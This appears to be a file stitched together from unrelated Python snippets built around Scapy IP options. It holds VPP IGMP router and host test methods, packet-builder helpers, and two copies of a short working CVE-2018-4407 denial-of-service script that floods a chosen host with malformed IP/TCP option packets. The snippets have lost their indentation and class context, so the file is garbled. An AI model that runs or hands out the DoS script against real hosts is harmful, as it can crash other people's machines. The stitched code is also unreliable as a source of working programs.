def _create_igmpv3_pck(self, itf, rtype, maddr, srcaddrs):
p = (Ether(dst=itf.local_mac, src=itf.remote_mac) /
IP(src=itf.remote_ip4, dst="224.0.0.22", tos=0xc0, ttl=1,
options=[IPOption(copy_flag=1, optclass="control",
option="router_alert")]) /
IGMPv3(type="Version 3 Membership Report") /
IGMPv3mr(numgrp=1) /
IGMPv3gr(rtype=rtype,
maddr=maddr, srcaddrs=srcaddrs))
return p
def run(self):
RHOST = self.rhost
try:
print("[*] !!!!!!Dangerous operation!!!!!!")
print("[*] Trying CVE-2018-4407 ICMP DOS " + RHOST)
for i in range(8, 20):
send(
IP(dst=RHOST, options=[IPOption("A" * i)]) /
TCP(dport=2323, options=[(19, "1" * 18), (19, "2" * 18)]))
print("[*] Check Over!! ")
except Exception as e:
print("[*] usage: Requires root privileges run")
def _apply_ipv4(self, ipv4_obj=None):
fields = {}
sip = self.packet.ipv4.source_ip.value
fields['src'] = sip
dip = self.packet.ipv4.destination_ip.value
fields['dst'] = dip
ttl = int(self.packet.ipv4.ttl)
fields['ttl'] = ttl
# version = int(self.packet.ipv4.ver)
if self.packet.ipv4.enable_header_len_override:
ihl = int(self.packet.ipv4.header_len_override_value)
fields['ihl'] = ihl
tos = int(self.packet.ipv4.dscp_decimal_value) * 4
fields['tos'] = tos
if self.packet.ipv4.length_override:
len = int(self.packet.ipv4.length_value)
fields['len'] = len
id = int(self.packet.ipv4.identifier)
fields['id'] = id
flags_list = []
if not self.packet.ipv4.fragment_enable:
flags_list.append("MF")
if self.packet.ipv4.fragment_last_enable:
flags_list.append("DF")
fields['flags'] = flags_list
frag = int(self.packet.ipv4.fragment_offset_decimal_value)
fields['frag'] = frag
proto = int(self.packet.ipv4.protocol)
fields['proto'] = proto
if self.packet.ipv4.checksum_mode == TGEnums.CHECKSUM_MODE.OVERRIDE:
chksum = int(self.packet.ipv4.custom_checksum)
fields['chksum'] = chksum
elif self.packet.ipv4.checksum_mode == TGEnums.CHECKSUM_MODE.INVALID:
fields['chksum'] = 65534
if self.packet.ipv4.options_padding != "{}":
options = [IPOption(self.packet.ipv4.options_padding)]
fields['options'] = options
self._scapy_packet = self._scapy_packet / IP(**fields)
def test_igmp_router(self):
""" IGMP Router Functions """
#
# Drop reports when not enabled
#
p_j = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst="224.0.0.22", tos=0xc0, ttl=1,
options=[IPOption(copy_flag=1, optclass="control",
option="router_alert")]) /
IGMPv3(type="Version 3 Membership Report") /
IGMPv3mr(numgrp=1) /
IGMPv3gr(rtype="Allow New Sources",
maddr="239.1.1.1", srcaddrs=["10.1.1.1", "10.1.1.2"]))
p_l = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst="224.0.0.22", tos=0xc0,
options=[IPOption(copy_flag=1, optclass="control",
option="router_alert")]) /
IGMPv3(type="Version 3 Membership Report") /
IGMPv3mr(numgrp=1) /
IGMPv3gr(rtype="Block Old Sources",
maddr="239.1.1.1", srcaddrs=["10.1.1.1", "10.1.1.2"]))
self.send(self.pg0, p_j)
self.assertFalse(self.vapi.igmp_dump())
#
# drop the default timer values so these tests execute in a
# reasonable time frame
#
self.vapi.cli("test igmp timers query 1 src 3 leave 1")
#
# enable router functions on the interface
#
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.vapi.igmp_enable_disable(self.pg0.sw_if_index,
1,
IGMP_MODE.ROUTER)
self.vapi.want_igmp_events(1)
#
# wait for router to send general query
#
for ii in range(3):
capture = self.pg0.get_capture(1, timeout=2)
self.verify_general_query(capture[0])
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
#
# re-send the report. VPP should now hold state for the new group
# VPP sends a notification that a new group has been joined
#
self.send(self.pg0, p_j)
self.assertTrue(wait_for_igmp_event(self, 1, self.pg0,
"239.1.1.1", "10.1.1.1", 1))
self.assertTrue(wait_for_igmp_event(self, 1, self.pg0,
"239.1.1.1", "10.1.1.2", 1))
dump = self.vapi.igmp_dump(self.pg0.sw_if_index)
self.assertEqual(len(dump), 2)
self.assertTrue(find_igmp_state(dump, self.pg0,
"239.1.1.1", "10.1.1.1"))
self.assertTrue(find_igmp_state(dump, self.pg0,
"239.1.1.1", "10.1.1.2"))
#
# wait for the per-source timer to expire
# the state should be reaped
# VPP sends a notification that the group has been left
#
self.assertTrue(wait_for_igmp_event(self, 4, self.pg0,
"239.1.1.1", "10.1.1.1", 0))
self.assertTrue(wait_for_igmp_event(self, 1, self.pg0,
"239.1.1.1", "10.1.1.2", 0))
self.assertFalse(self.vapi.igmp_dump())
#
# resend the join. wait for two queries and then send a current-state
# record to include all sources. this should reset the expiry time
# on the sources and thus they will still be present in 2 seconds time.
# If the source timer was not refreshed, then the state would have
# expired in 3 seconds.
#
self.send(self.pg0, p_j)
self.assertTrue(wait_for_igmp_event(self, 1, self.pg0,
"239.1.1.1", "10.1.1.1", 1))
self.assertTrue(wait_for_igmp_event(self, 1, self.pg0,
"239.1.1.1", "10.1.1.2", 1))
dump = self.vapi.igmp_dump(self.pg0.sw_if_index)
self.assertEqual(len(dump), 2)
capture = self.pg0.get_capture(2, timeout=3)
self.verify_general_query(capture[0])
self.verify_general_query(capture[1])
p_cs = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst="224.0.0.22", tos=0xc0,
options=[IPOption(copy_flag=1, optclass="control",
option="router_alert")]) /
IGMPv3(type="Version 3 Membership Report") /
IGMPv3mr(numgrp=1) /
IGMPv3gr(rtype="Mode Is Include",
maddr="239.1.1.1", srcaddrs=["10.1.1.1", "10.1.1.2"]))
self.send(self.pg0, p_cs)
self.sleep(2)
dump = self.vapi.igmp_dump(self.pg0.sw_if_index)
self.assertEqual(len(dump), 2)
self.assertTrue(find_igmp_state(dump, self.pg0,
"239.1.1.1", "10.1.1.1"))
self.assertTrue(find_igmp_state(dump, self.pg0,
"239.1.1.1", "10.1.1.2"))
#
# wait for the per-source timer to expire
# the state should be reaped
#
self.assertTrue(wait_for_igmp_event(self, 4, self.pg0,
"239.1.1.1", "10.1.1.1", 0))
self.assertTrue(wait_for_igmp_event(self, 1, self.pg0,
"239.1.1.1", "10.1.1.2", 0))
self.assertFalse(self.vapi.igmp_dump())
#
# resend the join, then a leave. Router sends a group+source
# specific query containing both sources
#
self.send(self.pg0, p_j)
self.assertTrue(wait_for_igmp_event(self, 1, self.pg0,
"239.1.1.1", "10.1.1.1", 1))
self.assertTrue(wait_for_igmp_event(self, 1, self.pg0,
"239.1.1.1", "10.1.1.2", 1))
dump = self.vapi.igmp_dump(self.pg0.sw_if_index)
self.assertEqual(len(dump), 2)
self.send(self.pg0, p_l)
capture = self.pg0.get_capture(1, timeout=3)
self.verify_group_query(capture[0], "239.1.1.1",
["10.1.1.1", "10.1.1.2"])
#
# the group specific query drops the timeout to leave (=1) seconds
#
self.assertTrue(wait_for_igmp_event(self, 2, self.pg0,
"239.1.1.1", "10.1.1.1", 0))
self.assertTrue(wait_for_igmp_event(self, 1, self.pg0,
"239.1.1.1", "10.1.1.2", 0))
self.assertFalse(self.vapi.igmp_dump())
self.assertFalse(self.vapi.igmp_dump())
#
# a TO_EX({}) / IN_EX({}) is treated like a (*,G) join
#
p_j = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst="224.0.0.22", tos=0xc0, ttl=1,
options=[IPOption(copy_flag=1, optclass="control",
option="router_alert")]) /
IGMPv3(type="Version 3 Membership Report") /
IGMPv3mr(numgrp=1) /
IGMPv3gr(rtype="Change To Exclude Mode", maddr="239.1.1.2"))
self.send(self.pg0, p_j)
self.assertTrue(wait_for_igmp_event(self, 1, self.pg0,
"239.1.1.2", "0.0.0.0", 1))
p_j = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst="224.0.0.22", tos=0xc0, ttl=1,
options=[IPOption(copy_flag=1, optclass="control",
option="router_alert")]) /
IGMPv3(type="Version 3 Membership Report") /
IGMPv3mr(numgrp=1) /
IGMPv3gr(rtype="Mode Is Exclude", maddr="239.1.1.3"))
self.send(self.pg0, p_j)
self.assertTrue(wait_for_igmp_event(self, 1, self.pg0,
"239.1.1.3", "0.0.0.0", 1))
#
# A 'allow sources' for {} should be ignored as it should
# never be sent.
#
p_j = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst="224.0.0.22", tos=0xc0, ttl=1,
options=[IPOption(copy_flag=1, optclass="control",
option="router_alert")]) /
IGMPv3(type="Version 3 Membership Report") /
IGMPv3mr(numgrp=1) /
IGMPv3gr(rtype="Allow New Sources", maddr="239.1.1.4"))
self.send(self.pg0, p_j)
dump = self.vapi.igmp_dump(self.pg0.sw_if_index)
self.assertTrue(find_igmp_state(dump, self.pg0,
"239.1.1.2", "0.0.0.0"))
self.assertTrue(find_igmp_state(dump, self.pg0,
"239.1.1.3", "0.0.0.0"))
self.assertFalse(find_igmp_state(dump, self.pg0,
"239.1.1.4", "0.0.0.0"))
#
# a TO_IN({}) and IS_IN({}) are treated like a (*,G) leave
#
self.vapi.cli("set logging class igmp level debug")
p_l = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst="224.0.0.22", tos=0xc0, ttl=1,
options=[IPOption(copy_flag=1, optclass="control",
option="router_alert")]) /
IGMPv3(type="Version 3 Membership Report") /
IGMPv3mr(numgrp=1) /
IGMPv3gr(rtype="Change To Include Mode", maddr="239.1.1.2"))
self.send(self.pg0, p_l)
self.assertTrue(wait_for_igmp_event(self, 2, self.pg0,
"239.1.1.2", "0.0.0.0", 0))
p_l = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst="224.0.0.22", tos=0xc0, ttl=1,
options=[IPOption(copy_flag=1, optclass="control",
option="router_alert")]) /
IGMPv3(type="Version 3 Membership Report") /
IGMPv3mr(numgrp=1) /
IGMPv3gr(rtype="Mode Is Include", maddr="239.1.1.3"))
self.send(self.pg0, p_l)
self.assertTrue(wait_for_igmp_event(self, 2, self.pg0,
"239.1.1.3", "0.0.0.0", 0))
self.assertFalse(self.vapi.igmp_dump(self.pg0.sw_if_index))
#
# disable router config
#
self.vapi.igmp_enable_disable(self.pg0.sw_if_index,
0,
IGMP_MODE.ROUTER)
def test_igmp_host(self):
""" IGMP Host functions """
#
# Enable interface for host functions
#
self.vapi.igmp_enable_disable(self.pg0.sw_if_index,
1,
IGMP_MODE.HOST)
#
# Add one S,G of state and expect a state-change event report
# indicating the addition of the S,G
#
h1 = self.add_group(self.pg0, IgmpSG("239.1.1.1", ["1.1.1.1"]))
# search for the corresponding state created in VPP
dump = self.vapi.igmp_dump(self.pg0.sw_if_index)
self.assertEqual(len(dump), 1)
self.assertTrue(find_igmp_state(dump, self.pg0,
"239.1.1.1", "1.1.1.1"))
#
# Send a general query (to the all router's address)
# expect VPP to respond with a membership report.
# Pad the query with 0 - some devices in the big wild
# internet are prone to this.
#
p_g = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst='224.0.0.1', tos=0xc0) /
IGMPv3(type="Membership Query", mrcode=100) /
IGMPv3mq(gaddr="0.0.0.0") /
Raw(b'\x00' * 10))
self.send(self.pg0, p_g)
capture = self.pg0.get_capture(1, timeout=10)
self.verify_report(capture[0],
[IgmpRecord(h1.sg, "Mode Is Include")])
#
# Group specific query
#
p_gs = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst='239.1.1.1', tos=0xc0,
options=[IPOption(copy_flag=1, optclass="control",
option="router_alert")]) /
IGMPv3(type="Membership Query", mrcode=100) /
IGMPv3mq(gaddr="239.1.1.1"))
self.send(self.pg0, p_gs)
capture = self.pg0.get_capture(1, timeout=10)
self.verify_report(capture[0],
[IgmpRecord(h1.sg, "Mode Is Include")])
#
# A group and source specific query, with the source matching
# the source VPP has
#
p_gs1 = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst='239.1.1.1', tos=0xc0,
options=[IPOption(copy_flag=1, optclass="control",
option="router_alert")]) /
IGMPv3(type="Membership Query", mrcode=100) /
IGMPv3mq(gaddr="239.1.1.1", srcaddrs=["1.1.1.1"]))
self.send(self.pg0, p_gs1)
capture = self.pg0.get_capture(1, timeout=10)
self.verify_report(capture[0],
[IgmpRecord(h1.sg, "Mode Is Include")])
#
# A group and source specific query that reports more sources
# than the packet actually has.
#
p_gs2 = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst='239.1.1.1', tos=0xc0,
options=[IPOption(copy_flag=1, optclass="control",
option="router_alert")]) /
IGMPv3(type="Membership Query", mrcode=100) /
IGMPv3mq(gaddr="239.1.1.1", numsrc=4, srcaddrs=["1.1.1.1"]))
self.send_and_assert_no_replies(self.pg0, p_gs2, timeout=10)
#
# A group and source specific query, with the source NOT matching
# the source VPP has. There should be no response.
#
p_gs2 = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst='239.1.1.1', tos=0xc0,
options=[IPOption(copy_flag=1, optclass="control",
option="router_alert")]) /
IGMPv3(type="Membership Query", mrcode=100) /
IGMPv3mq(gaddr="239.1.1.1", srcaddrs=["1.1.1.2"]))
self.send_and_assert_no_replies(self.pg0, p_gs2, timeout=10)
#
# A group and source specific query, with the multiple sources
# one of which matches the source VPP has.
# The report should contain only the source VPP has.
#
p_gs3 = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst='239.1.1.1', tos=0xc0,
options=[IPOption(copy_flag=1, optclass="control",
option="router_alert")]) /
IGMPv3(type="Membership Query", mrcode=100) /
IGMPv3mq(gaddr="239.1.1.1",
srcaddrs=["1.1.1.1", "1.1.1.2", "1.1.1.3"]))
self.send(self.pg0, p_gs3)
capture = self.pg0.get_capture(1, timeout=10)
self.verify_report(capture[0],
[IgmpRecord(h1.sg, "Mode Is Include")])
#
# Two source and group specific queries in quick succession, the
# first does not have VPPs source the second does. then vice-versa
#
self.send(self.pg0, [p_gs2, p_gs1])
capture = self.pg0.get_capture(1, timeout=10)
self.verify_report(capture[0],
[IgmpRecord(h1.sg, "Mode Is Include")])
self.send(self.pg0, [p_gs1, p_gs2])
capture = self.pg0.get_capture(1, timeout=10)
self.verify_report(capture[0],
[IgmpRecord(h1.sg, "Mode Is Include")])
#
# remove state, expect the report for the removal
#
self.remove_group(h1)
dump = self.vapi.igmp_dump()
self.assertFalse(dump)
#
# A group with multiple sources
#
h2 = self.add_group(self.pg0,
IgmpSG("239.1.1.1",
["1.1.1.1", "1.1.1.2", "1.1.1.3"]))
# search for the corresponding state created in VPP
dump = self.vapi.igmp_dump(self.pg0.sw_if_index)
self.assertEqual(len(dump), 3)
for s in h2.sg.saddrs:
self.assertTrue(find_igmp_state(dump, self.pg0,
"239.1.1.1", s))
#
# Send a general query (to the all router's address)
# expect VPP to respond with a membership report will all sources
#
self.send(self.pg0, p_g)
capture = self.pg0.get_capture(1, timeout=10)
self.verify_report(capture[0],
[IgmpRecord(h2.sg, "Mode Is Include")])
#
# Group and source specific query; some present some not
#
p_gs = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst='239.1.1.1', tos=0xc0,
options=[IPOption(copy_flag=1, optclass="control",
option="router_alert")]) /
IGMPv3(type="Membership Query", mrcode=100) /
IGMPv3mq(gaddr="239.1.1.1",
srcaddrs=["1.1.1.1", "1.1.1.2", "1.1.1.4"]))
self.send(self.pg0, p_gs)
capture = self.pg0.get_capture(1, timeout=10)
self.verify_report(capture[0],
[IgmpRecord(
IgmpSG('239.1.1.1', ["1.1.1.1", "1.1.1.2"]),
"Mode Is Include")])
#
# add loads more groups
#
h3 = self.add_group(self.pg0,
IgmpSG("239.1.1.2",
["2.1.1.1", "2.1.1.2", "2.1.1.3"]))
h4 = self.add_group(self.pg0,
IgmpSG("239.1.1.3",
["3.1.1.1", "3.1.1.2", "3.1.1.3"]))
h5 = self.add_group(self.pg0,
IgmpSG("239.1.1.4",
["4.1.1.1", "4.1.1.2", "4.1.1.3"]))
h6 = self.add_group(self.pg0,
IgmpSG("239.1.1.5",
["5.1.1.1", "5.1.1.2", "5.1.1.3"]))
h7 = self.add_group(self.pg0,
IgmpSG("239.1.1.6",
["6.1.1.1", "6.1.1.2",
"6.1.1.3", "6.1.1.4",
"6.1.1.5", "6.1.1.6",
"6.1.1.7", "6.1.1.8",
"6.1.1.9", "6.1.1.10",
"6.1.1.11", "6.1.1.12",
"6.1.1.13", "6.1.1.14",
"6.1.1.15", "6.1.1.16"]))
#
# general query.
# the order the groups come in is not important, so what is
# checked for is what VPP is sending today.
#
self.send(self.pg0, p_g)
capture = self.pg0.get_capture(1, timeout=10)
self.verify_report(capture[0],
[IgmpRecord(h3.sg, "Mode Is Include"),
IgmpRecord(h2.sg, "Mode Is Include"),
IgmpRecord(h6.sg, "Mode Is Include"),
IgmpRecord(h4.sg, "Mode Is Include"),
IgmpRecord(h5.sg, "Mode Is Include"),
IgmpRecord(h7.sg, "Mode Is Include")])
#
# modify a group to add and remove some sources
#
h7.sg = IgmpSG("239.1.1.6",
["6.1.1.1", "6.1.1.2",
"6.1.1.5", "6.1.1.6",
"6.1.1.7", "6.1.1.8",
"6.1.1.9", "6.1.1.10",
"6.1.1.11", "6.1.1.12",
"6.1.1.13", "6.1.1.14",
"6.1.1.15", "6.1.1.16",
"6.1.1.17", "6.1.1.18"])
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
h7.add_vpp_config()
capture = self.pg0.get_capture(1, timeout=10)
self.verify_report(capture[0],
[IgmpRecord(IgmpSG("239.1.1.6",
["6.1.1.17", "6.1.1.18"]),
"Allow New Sources"),
IgmpRecord(IgmpSG("239.1.1.6",
["6.1.1.3", "6.1.1.4"]),
"Block Old Sources")])
#
# add an additional groups with many sources so that each group
# consumes the link MTU. We should therefore see multiple state
# state reports when queried.
#
self.vapi.sw_interface_set_mtu(self.pg0.sw_if_index, [560, 0, 0, 0])
src_list = []
for i in range(128):
src_list.append("10.1.1.%d" % i)
h8 = self.add_group(self.pg0,
IgmpSG("238.1.1.1", src_list))
h9 = self.add_group(self.pg0,
IgmpSG("238.1.1.2", src_list))
self.send(self.pg0, p_g)
capture = self.pg0.get_capture(4, timeout=10)
self.verify_report(capture[0],
[IgmpRecord(h3.sg, "Mode Is Include"),
IgmpRecord(h2.sg, "Mode Is Include"),
IgmpRecord(h6.sg, "Mode Is Include"),
IgmpRecord(h4.sg, "Mode Is Include"),
IgmpRecord(h5.sg, "Mode Is Include")])
self.verify_report(capture[1],
[IgmpRecord(h8.sg, "Mode Is Include")])
self.verify_report(capture[2],
[IgmpRecord(h7.sg, "Mode Is Include")])
self.verify_report(capture[3],
[IgmpRecord(h9.sg, "Mode Is Include")])
#
# drop the MTU further (so a 128 sized group won't fit)
#
self.vapi.sw_interface_set_mtu(self.pg0.sw_if_index, [512, 0, 0, 0])
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
h10 = VppHostState(self,
IGMP_FILTER.INCLUDE,
self.pg0.sw_if_index,
IgmpSG("238.1.1.3", src_list))
h10.add_vpp_config()
capture = self.pg0.get_capture(2, timeout=10)
# wait for a little bit
self.sleep(1)
#
# remove state, expect the report for the removal
# the dump should be empty
#
self.vapi.sw_interface_set_mtu(self.pg0.sw_if_index, [600, 0, 0, 0])
self.remove_group(h8)
self.remove_group(h9)
self.remove_group(h2)
self.remove_group(h3)
self.remove_group(h4)
self.remove_group(h5)
self.remove_group(h6)
self.remove_group(h7)
self.remove_group(h10)
self.logger.info(self.vapi.cli("sh igmp config"))
self.assertFalse(self.vapi.igmp_dump())
#
# TODO
# ADD STATE ON MORE INTERFACES
#
self.vapi.igmp_enable_disable(self.pg0.sw_if_index,
0,
IGMP_MODE.HOST)
# CVE-2018-4407 ICMP DOS
# https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407
import sys
from telnetlib import IP
from scapy.all import *
# try:
# from scapy.all import *
# except Exception as e:
# print ("[*] You need install scapy first:\n[*] sudo pip install scapy ")
from scapy.layers.inet import IPOption, TCP
if __name__ == '__main__':
try:
check_ip = sys.argv[1]
print("[*] !!!!!!Dangerous operation!!!!!!")
print("[*] Trying CVE-2018-4407 ICMP DOS " + check_ip)
for i in range(8, 20):
send(IP(dst=check_ip, options=[IPOption("A"*i)])/TCP(dport=2323, options=[(19, "1"*18), (19, "2"*18)]))
print("[*] Check Over!! ")
except Exception as e:
print("[*] usage: sudo python check_icmp_dos.py 127.0.0.1")
def createIP(self,
version,
IHL,
DSCP,
length,
ID,
reservedFlag,
dontFragmentFlag,
moreFragmentsFlag,
fragmentOffset,
TTL,
protocol,
checksum,
srcAddr,
dstAddr,
options,
data,
index=None):
try:
# check if input is valid
if version == '':
raise MyPacketError('Не указана версия протокола IP.')
if DSCP == '':
raise MyPacketError('Не указан тип сервиса.')
if ID == '':
raise MyPacketError('Не указан ID.')
if TTL == '':
raise MyPacketError('Не указано время жизни.')
if srcAddr == '':
raise MyPacketError('Не указан IP-адрес отправки.')
if dstAddr == '':
raise MyPacketError('Не указан IP-адрес назначения.')
# prepare
if checksum == '':
N_checksum = None
else:
N_checksum = int(checksum, 16)
N_flags = 0
N_flags += 0b100 if reservedFlag else 0
N_flags += 0b010 if dontFragmentFlag else 0
N_flags += 0b001 if moreFragmentsFlag else 0
if IHL == '':
N_IHL = None
else:
N_IHL = int(IHL)
if length == '':
N_length = None
else:
N_length = int(length)
if fragmentOffset == '':
N_fragmentOffset = 0
else:
N_fragmentOffset = int(fragmentOffset)
print("ver: " + str(version))
print("ihl: " + str(N_IHL))
print("tos: " + str(DSCP))
print("len: " + str(N_length))
print("id: " + str(ID))
print("flags: " + str(N_flags))
print("offset: " + str(N_fragmentOffset))
print("ttl: " + str(TTL))
print("protocol: " + str(protocol))
print("checksum: " + str(N_checksum))
print("src: " + str(srcAddr))
print("dst: " + str(dstAddr))
print("dst: " + str(options))
#construct packet
#packet = IP(
# version= int(version),
# ihl= N_IHL,
# tos= int(DSCP),
# len= N_length,
# id= int(ID),
# flags= N_flags,
# frag= N_fragmentOffset,
# ttl= int(TTL),
# proto= protocol,
# chksum= N_checksum,
# src= srcAddr,
# dst= dstAddr,
# options= IPOption(options)
#)
packet = dict(version=int(version),
ihl=N_IHL,
tos=int(DSCP),
len=N_length,
id=int(ID),
flags=N_flags,
frag=N_fragmentOffset,
ttl=int(TTL),
proto=protocol,
chksum=N_checksum,
src=srcAddr,
dst=dstAddr,
options=IPOption(options) if options != '' else [],
data=Raw(load=data) if data != '' else None)
#if data != '':
# packet = packet / Raw(load=data)
print('IP(version=' + str(version) + ',ihl=' + str(N_IHL) +
',tos=' + str(DSCP) + ',len=' + str(N_length) + ',id=' +
str(ID) + ',flags=' + str(N_flags) + ',frag=' +
str(N_fragmentOffset) + ',ttl=' + str(TTL) + ',proto=' +
str(protocol) + ',chksum=' + str(N_checksum) + ',src=' +
str(srcAddr) + ',dst=' + str(dstAddr) +
',options=IPOption(' + str(options) + ')' +
' / raw(load=data)')
except MyPacketError as e:
raise MyPacketError('Ошибка при создании пакета.')
return None
#add to list
print(str(index))
if index == None or index >= len(self.listPackets):
self.listPackets.append(
packetClass(flag=True if data != '' else False, ip=packet))
else:
self.listPackets[index].layerIP = packet
if (data != ''):
self.listPackets[index].underLayer = None
return packet